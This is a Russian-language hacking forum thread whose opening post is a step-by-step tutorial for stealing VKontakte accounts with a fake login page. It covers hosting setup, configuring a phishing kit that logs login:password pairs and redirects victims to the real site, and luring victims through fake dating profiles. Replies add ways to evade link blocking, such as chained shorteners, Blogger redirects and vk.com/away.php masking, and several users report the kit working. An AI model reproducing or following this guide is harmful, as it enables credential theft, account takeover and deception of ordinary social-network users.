Способ добычи аккаунтов вконтакте

Тема в разделе "Взлом и уязвимости", создана пользователем Jack Sparrow, 20 окт 2016.

  1. Jack Sparrow

    Jack Sparrow

    Сообщения:
    222
    Баллы:
    16
    Привет riddley2020 сейчас я покажу один из способов добычи аккаунтов вк

    Разберем наши действия, что бы не запутаться:
    1)Регистрируемся на хостинге.
    2)Настраиваем файлы под себя.
    3)Заливаем файлы на хостинг, проверяем работоспособность.
    4)Делаем ссылку с переадресацией на наш фейк-сайт.
    5)Тащим трафик на наш фэйк.

    С начала прочитайте статью, и закиньте готовые файлы (которые будут в архиве, на хост), проверьте работоспособность и после можете уже полностью переделывать фейк под себя.

    Регистрируемся на хостинге.

    Для начала берем обычный бесплатный хостинг, в качестве пробника. (если уже сталкивались с этим, отлично)
    Я возьму первый попавшийся в поиске - jino.ru
    Проходите регистрацию (кто шарит, листайте дальше, тут я объясню как зарегистрироваться и куда "тыкать" для тех кому это в новинку)
    Можете просто авторизироваться через любую соц сеть и т.д. (или пройти регистрацию через сотовый телефон или мыло)
    После этого вас перенаправит на главную страницу, там увидите кнопку - Хостинг, нажимайте.
    Вверху будет надпись - Управление, наводим на нее мышкой, откроется список, выбираете FTP-аккаунты, нажимаем.
    Там будет ваш логин, с права от него карандаш, нажимаете на карандаш и пишите пароль, любой, лишь бы вы его запомнили (это будет ваш пароль от FTP, куда позже зальем необходимые файлы)

    Теперь сохраните логин, пароль, имя сервера для дальнейшего подключения к FTP.
    Все данные от FTP увидите на той же странице где ставили пароль на FTP - https://cp-hosting.jino.ru/management/ftp/

    Настраиваем файлы под себя и свои нужды.

    После прочтения статьи, вы сможете сделать фэйк любого нужного вам сайта, будь то новости, определенной город, музыкальная тематика, игровая, поиск работы и т.д, для получения необходимых аккаунтов, пол, возраст, город.
    Я возьму простой сайт, с голосованиями, и буду лить трафик через фейка вк.
    Все мои данные замените на свои, как все это сделать я напишу далее.

    Разберем файлы, что к чему:
    back.jpg - это фон нашего фейка.
    index.php - Основной файл фейка, в этом файле будем настраивать текст в окне авторизации и title (Описание страницы)
    login.php - Данный файл отвечает за перенаправление пользователя после ввода логина и пароля. (куда его переадресует после ввода своих данных, на настоящий сайт, что-бы он не понял что его данные ушли к нам)
    piratebuhta.php - Тут все просто, здесь будут введенные данные пользователей в формате loginassword

    Теперь будем переделывать файлы под себя:
    back.jpg - это фон нашего фейка.
    Нашли сайт, фейк которого будем делать, нам нужен его фон, идем на сайт - Website Screenshot Generation - Website Thumbnail Service
    Вставляем ссылку сайта на котором он сделает скриншот и выбираем размер: 1600х1200 (обязательно)
    Скачиваем и сохраняем, его название должно быть именно back, иначе фон не будет отображаться.

    Следующий файл.
    index.php
    В нем настраивать нам нужно будет только данное окно:
    [​IMG]
    Первым делом смотрим 7 строку кода:
    PHP:
    <title>Конкурс</title>
    Эта надпись отображается во вкладке, в самом ее верху, не столь важно но может вам пригодится.
    Теперь идем почти в самый низ кода, примерно 70-я его строка и видим:
    PHP:
    <div class="info_line">Приложение <b><a href="http://cats.radiodacha.ru" target="_blank">Радио дача</a></b>
    Вам нужно будет заменить ссылку Конкурс Радио Дача на свою (настоящего сайта, фейк которого вы будите делать)
    И текст "Радио дача" под свой фейк, все с данным файлом разобрались.

    Следующий файл:
    login.php - Данный файл отвечает за перенаправление пользователя после ввода логина и пароля. (куда его переадресует после ввода своих данных, на тот самый сайт где мы делали скрин)
    Смотрим 6-ю строку кода:
    PHP:
    $LOCATION="https://piratebuhta.cc";
    Пиратская бухта - меняем на настоящий сайт откуда брали фон, дабы не было подозрений.

    Файл piratebuhta.php - для него нет настроек, в нем будем проверять приходят ли логин и пароль с сайта.

    Заливаем файлы на хостинг, проверяем работоспособность.

    Тут все просто, для тех кто умеет, заливайте, вводите логин и пароль, смотрите файл piratebuhta.php там должна добавиться строка логин:пароль, если ее нет, смотрите где могли допустить ошибку выше. Если есть, значит все готово и переходите к следующему шагу.

    Теперь вернемся к нашему FTP, скачайте любой файловый менеджер например FileZilla - Скачать FileZilla — бесплатный FTP-клиент | FileZilla Server
    Скачали, установили, теперь авторизируемся на наш хостинг через FTP:
    Переходим на сайт jino.ru во вкладку FTP - https://cp-hosting.jino.ru/management/ftp/
    Смотрим ваш Хост, Имя пользователя, все это копируем в FileZilla и нажимаем "Быстрое соединение" (пароль ставили еще при регистрации, если забыли просто обновите его)
    Идем по такому пути:
    /domains/Ваш_логин.myjino.ru там будет файл index.html - его удаляем и закидываем наши подготовленные файлы в данную директорию.

    Теперь проверим, все-ли правильно вы сделали, идем на ваш сайт и должны видеть такую картину:
    [​IMG]
    Пробуем ввести любые цифры или буквы в оба поля и нажать войти, вас должно перенаправить на сайт который вы указали в файле login.php
    После чего откроем файл piratebuhta.php и посмотрим работает ли наш скрипт:
    [​IMG]
    Как видите все пришло, а это значит он полностью готов к работе.

    Тащим трафик на наш фэйк.

    Как это делать, дело абсолютно каждого, я приведу один из сотни примеров.
    Создаете аккаунт обычной девушки с обычными фотографиями, все заполняете и т.д.
    Вам необходимо прогнать ссылку на ваш сайт через несколько сократителей ссылок (Что-бы не заблокировали ссылку на ваш сайт):
    К примеру идете на Лучший сокращатель ссылок вставляете ссылку на ваш сайт и сокращаете, у вас получится примерно такая ссылка - http://wbt.link/3S6Vl , после чего идем на Сокращатель ссылок - Косинус! и вставляем уже сокращенную вашу ссылку, получаем такую - http://cos30.ru/-QODC ее закрепляем на стене вк, и пишем примерно такой текст:
    Кто проголосует открою личку и т.д.
    Раскидываем наши фотографии в мужские группы.
    Так-же если хотите женские аккаунты создавайте фейка мужчину и заливайте фото в группы со знакомством, тут можно массу всего придумать, больше фантазии больше аккаунтов, можете скрипт переделать под другую соц сеть или сайт.


    Ссылка на весь необходимый материал - фейк.rar
  2. Nicky/FF/

    Nicky/FF/

    Сообщения:
    111
    Баллы:
    16
    персонально, спасибо большое!
    Один вопрос, я пока не юзал, сокращатель ссылок пашет норм? Потому что когда я кидал короткие, которые потом были повторно прогнаны через vk.cc их вк блочил как потенциально опасные или чет такое.
  3. Jack Sparrow

    Jack Sparrow

    Сообщения:
    222
    Баллы:
    16
    Сократители постоянно менять нужно, иначе блокирует ссылку, просто редирект поставить можно и все, через тот-же блоггер.
  4. Deff

    Deff

    Сообщения:
    162
    Баллы:
    16
    Все публичные сервисы сокращений вообще бесполезны, вк или их банит, или они прозрачны для него и он видит конечную ссылку. Так что да, блоггер, свои домены, ну или другие способы.
  5. Nicky/FF/

    Nicky/FF/

    Сообщения:
    111
    Баллы:
    16
    Не подскажешь каким образом через блоггер? я, как бы помягче сказать, профан в этом деле.
  6. Deff

    Deff

    Сообщения:
    162
    Баллы:
    16
    Забей в поиск, куча мануалов по теме, вот первое попавшееся
  7. Nicky/FF/

    Nicky/FF/

    Сообщения:
    111
    Баллы:
    16
    Cпасибо большое! Все понял!
  8. Nataniel_Black

    Nataniel_Black

    Сообщения:
    79
    Баллы:
    6
    Облако маил ру заблокировало файл, пишет что вирусы, скачать не получается
  9. Nicky/FF/

    Nicky/FF/

    Сообщения:
    111
    Баллы:
    16
    Только хотел написать, не дает скачать, пробовал себе в облако заливать и оттуда уже качать??
  10. Nataniel_Black

    Nataniel_Black

    Сообщения:
    79
    Баллы:
    6
    Не дает, в ссаном маил ру никогда ничего толком нормально никогда не работало.
  11. Nicky/FF/

    Nicky/FF/

    Сообщения:
    111
    Баллы:
    16
    Jack Sparrow, если не трудно, на яндекс или какой-нибудь ргхост залей. Мыло все кабенится
  12. Jack Sparrow

    Jack Sparrow

    Сообщения:
    222
    Баллы:
    16
    Хорошо, сейчас исправлю ссылку.
  13. Вальсирующий сыч

    Вальсирующий сыч

    Сообщения:
    43
    Баллы:
    6
    а если еще и ссылку замаскировать вот так https://vk.com/away.php?to=http://piratebuhta.cc и кинуть ее на стену, то палева куда меньше... + такая ссылка открывается в том же окне
  14. Firbo1

    Firbo1

    Сообщения:
    38
    Баллы:
    6
    Очень помог, спасибо!
  15. Blackbeard

    Blackbeard

    Сообщения:
    13
    Баллы:
    1
    Спасибо, наконец разобрался как это всё работает. Теперь буду ждать "клиентов")
  16. Вальсирующий сыч

    Вальсирующий сыч

    Сообщения:
    43
    Баллы:
    6
    сделал все как написано в инструкции, все работает, редирект сделал через блогер, ток видео-инструкцию использовал другую ()... так же для техкто тоже решит делать редирект через блогер, посоветую в настройках шаблонов мобильных устройств поставить применять как для пк... что бы редирект шел через мобилы тоже)
    P.s. спасибо за статью)
  17. Firbo1

    Firbo1

    Сообщения:
    38
    Баллы:
    6
    На счет телефона, спасибо. Тоже столкнулся с проблемой не перехода на смартфоне.
  18. ALEXo

    ALEXo

    Сообщения:
    54
    Баллы:
    6
  19. Amstel

    Amstel

    Сообщения:
    833
    Баллы:
    16
    ссылки запрещены. школосервис тырит твои же акки.
  20. NETSLOV

    NETSLOV

    Сообщения:
    9
    Баллы:
    1
    Спасибо, все максимально детально описал. Как изменять index файл, чтобы было окно не вк а другого сайта ?

Поделиться этой страницей